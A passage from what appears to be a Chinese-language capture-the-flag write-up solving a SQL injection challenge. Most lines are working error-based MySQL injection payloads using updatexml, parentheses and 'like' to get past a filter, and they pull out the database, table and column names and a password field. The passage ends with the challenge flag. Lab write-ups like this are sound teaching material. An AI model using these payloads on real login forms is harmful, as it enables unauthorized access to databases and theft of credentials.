发现长度为736的都被过滤掉了
2、观察error界面,猜测应该是报错注入
先爆数据库名
1 admin'or(updatexml(1,concat(0x7e,database(),0x7e),1))#、 0x7e代表~
得到数据库名geek
3、爆表名
1 admin'or(updatexml(1,concat(0x7e,(select(table_name)from(information_schema.tables)where(table_schema)like('geek')),0x7e),1))#
4、查列名
1 admin'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')),0x7e),1))#
5、看字段名
1 admin'or(updatexml(1,concat(0x7e,(select(group_concat(id,'~',username,'~',password))from(H4rDsq1)),0x7e),1))#
1 admin'or(updatexml(1,concat(0x7e,(select(right(password,35))from(H4rDsq1)),0x7e),1))#
1 admin'or(updatexml(1,concat(0x7e,(select(right(password,30))from(H4rDsq1)),0x7e),1))#
flag{de3b1418-5464-4898-93b1-d426e57889b3}